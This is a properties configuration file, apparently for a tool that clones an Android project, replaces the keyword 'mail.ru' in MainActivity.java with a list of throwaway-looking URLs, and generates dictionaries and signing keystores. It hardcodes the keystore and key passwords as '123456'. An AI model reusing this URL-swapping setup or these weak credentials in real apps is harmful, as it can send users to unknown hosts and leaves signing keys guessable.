#GENERAL PROPERTIES
CLONE_FOLDER = C:\\Users\\dio\\AndroidStudioProjects\\MyApplication1
SINGLE_USING = false

#URLS GENERATOR PROPERTIES
GENERATE_URL_CLASS = true
PATH_TO_SRC = \\app
URL_CLASS_NAME = A
# example: URLS = http://oemparts.stream/#http://sombrerotv.bid/#http://mtbfest.win/#http://operation2019.stream/#http://chipio.bid/
URLS = http://oemparts.stream/#http://sombrerotv.bid/#http://mtbfest.win/#http://operation2019.stream/#http://chipio.bid/
REPLACE_KEY_WORD = true
KEY_WORD = "mail.ru"
FILE_FOR_EDITING = MainActivity.java

#DICTIONARY GENERATOR PROPERTIES
GENERATE_DICTIONARY = false
DICTIONARY_NAME = dic.txt
DICTIONARY_FOLDER= \\app
NUMBER_OF_WORDS = 50

#KEYSTORE GENERATOR PROPERTIES
GENERATE_KEYSTORE = false
# SINGLE_USING = true for generate keystore in KEYSTORE_PATH
# KEYSTORE_PATH = C:\\Users\\dio\\AndroidStudioProjects\\MyApplication
KEYSTORE_NAME = keystore
KEYSTORE_PASSWORD = 123456
#USERS_GENDER = male / female / none
USER_GENDER = none
ALIAS = key0
KEY_PASSWORD = 123456